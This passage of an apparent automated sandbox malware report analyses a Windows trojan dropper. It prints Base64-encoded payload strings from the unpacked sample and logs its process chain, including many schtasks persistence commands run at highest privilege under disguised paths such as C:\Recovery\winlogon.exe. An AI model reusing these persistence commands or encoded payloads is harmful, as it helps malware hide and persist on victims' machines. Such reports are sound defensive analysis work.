'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
Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, qJk.cs Base64 encoded string: 'H4sIAAAAAAAEAMsoKSkottLXzyzIzEvL18vM188qzs8DACTOYY8WAAAA', 'H4sIAAAAAAAACssoKSkottLXTyzI1Mss0CtO0k9Pzc8sAABsWDNKFwAAAA=='
Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, sz3.cs Base64 encoded string: 'IRHKkK7+9S0IugXON3gvLsxJjZL9YaEKz/ItfY2KMibv3HGRDY4HX1+0x6vyRlP1N4gE0v20VeDKoKK009sEy3ouyqPq1nDV7UInHLKa0+i1EzCuhkbBF+hHquku7Lo/yvKfWKTtDSC0cid2m2aAXySLeN9z77QHOw6ohp+EDczjdlkMq8m7a2ClwiEast7dEwz6w4bD8wTSzoz4j5qzrO8RqjmHTyrApuBSl+1gu2s5LoFXoH5oPozdF2hTyr4UJafbA2pNEGdP/VLXgbIg4QM5bvggf+gkojeqw45IqHRg8ZcCDn/xnBJvzaQskNO/n2SyskcGTGC2IHglQTunUGHh4+wEaQYtR4uojeQt1AxtzrO/QY7Xs4yhQpA5ELH1fxkHlN9mBEm06zoECj/vz7jJG2mQlWiHY9U9LUYCXv/lx66c36E3vw4zQ5xVrzhaydHvLiCXt0pZUDFEWfZaVaZ5AKGW0zqkBSvHh4qMXIukrkK1kUF6G2eX26nBF9etwOUvoJ9uQsq2Dy+GQBdk03ZdTGhPoKKJfEvzulE4FSXAoUFrTLyla3gXMOhV434cPyDRSbyiZCGATsBDfEtT+1yp5qKdbJS1GVEo5JVGDZl853Kba/dh4CBx/W6Bj/DOJfimC7NBUJ/HnfsGb830T09NrdXxjZIarRpeDSqLXVWibkiIPnFO4OU2WXtEARxfTEp9gbRaEngqlbHte7O4oMf4xO52NXpTo1ex3oIjKRiCMDA77sbJvezZ+hixbnlgDJbVmAulozOcoeLeIT3ajMgqvfmAPVAXbuYvJdtKwevtf2DUl7lEqIkiitboMQ9wa/o5JrJJMwrsX1U4U56gMIX+zCYsR3sgBH+1dLI394nm8h9oLc/7DXLFKCEkJSnOT6P/PRLwNHmWcoHO0WJ5Y6IdGtC8rsInOmg1aD9JbLPqksSmWRX6XfZYmKthY9wC1SDjDFSXykgutRHU6ciKTBRxlvwAPW8V/yOJ1rOCNpk='
Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, Class17.cs Base64 encoded string: 'ICBfX18gICAgICAgICAgIF8gICAgICBfX18gICAgICAgICAgICAgXyAgICAgICAgXyAgIF9fXyAgICBfIF9fX19fIA0KIHwgICBcIF9fIF8gXyBffCB8X18gIC8gX198XyBfIF8gIF8gX198IHxfIF9fIF98IHwgfCBfIFwgIC9fXF8gICBffA0KIHwgfCkgLyBfYCB8ICdffCAvIC8gfCAoX198ICdffCB8fCAoXy08ICBfLyBfYCB8IHwgfCAgIC8gLyBfIFx8IHwgIA0KIHxfX18vXF9fLF98X3wgfF9cX1wgIFxfX198X3wgIFxfLCAvX18vXF9fXF9fLF98X3wgfF98X1wvXy8gXF9cX3wgIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHxfXy8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA=='
Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, Class16.cs Base64 encoded string: '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
Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, HBw.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, HBw.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, HBw.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, HBw.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.spre.troj.expl.evad.winEXE@60/41@2/2
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A27727 GetLastError,FormatMessageW, 0_2_00A27727
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A3B6D2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree, 0_2_00A3B6D2
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File created: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe File created: C:\Users\user\AppData\Roaming\msBroker Jump to behavior
Source: C:\Recovery\winlogon.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7908:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5000:120:WilError_03
Source: C:\Recovery\winlogon.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-wSLzwx2vNs3ciNJLvHL2
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7612:120:WilError_03
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0 Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat" "
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Command line argument: sfxname 0_2_00A3F05C
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Command line argument: sfxstime 0_2_00A3F05C
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Command line argument: STARTDLG 0_2_00A3F05C
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Command line argument: sfxname 3_2_0032F05C
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Command line argument: sfxstime 3_2_0032F05C
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Command line argument: p05 3_2_0032F05C
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Command line argument: STARTDLG 3_2_0032F05C
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Command line argument: sfxname 4_2_0073DF1E
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Command line argument: sfxstime 4_2_0073DF1E
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Command line argument: STARTDLG 4_2_0073DF1E
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Command line argument: xzw 4_2_0073DF1E
Source: H9gMIu2HXi.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe File read: C:\Windows\win.ini Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: H9gMIu2HXi.exe Virustotal: Detection: 60%
Source: H9gMIu2HXi.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe File read: C:\Users\user\Desktop\H9gMIu2HXi.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\H9gMIu2HXi.exe "C:\Users\user\Desktop\H9gMIu2HXi.exe"
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe work.exe -priverdD
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Process created: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe "C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msBroker\xIIr5uE.vbe"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\msBroker\2lT5LH2HofMC1aCPgzVrsLj8Fs1JHh.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe "C:\Users\user\AppData\Roaming\msBroker/SurrogatewebSession.exe"
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /f
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZ" /sc ONLOGON /tr "'C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe "C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe"
Source: unknown Process created: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe "C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41D7.tmp" "c:\Windows\System32\CSCD00016AF5F994D2B979CA07EFAA630F3.TMP"
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /f
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZ" /sc ONLOGON /tr "'C:\Program Files (x86)\java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\Recovery\winlogon.exe'" /f
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\winlogon.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Recovery\winlogon.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 8 /tr "'C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /f
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZ" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 5 /tr "'C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /f
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZ" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SurrogatewebSessionS" /sc MINUTE /mo 12 /tr "'C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe'" /f
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SurrogatewebSession" /sc ONLOGON /tr "'C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SurrogatewebSessionS" /sc MINUTE /mo 8 /tr "'C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe'" /rl HIGHEST /f
Source: unknown Process created: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
Source: unknown Process created: C:\Recovery\winlogon.exe C:\Recovery\winlogon.exe
Source: unknown Process created: C:\Recovery\winlogon.exe C:\Recovery\winlogon.exe
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NZDl7DWO67.bat"
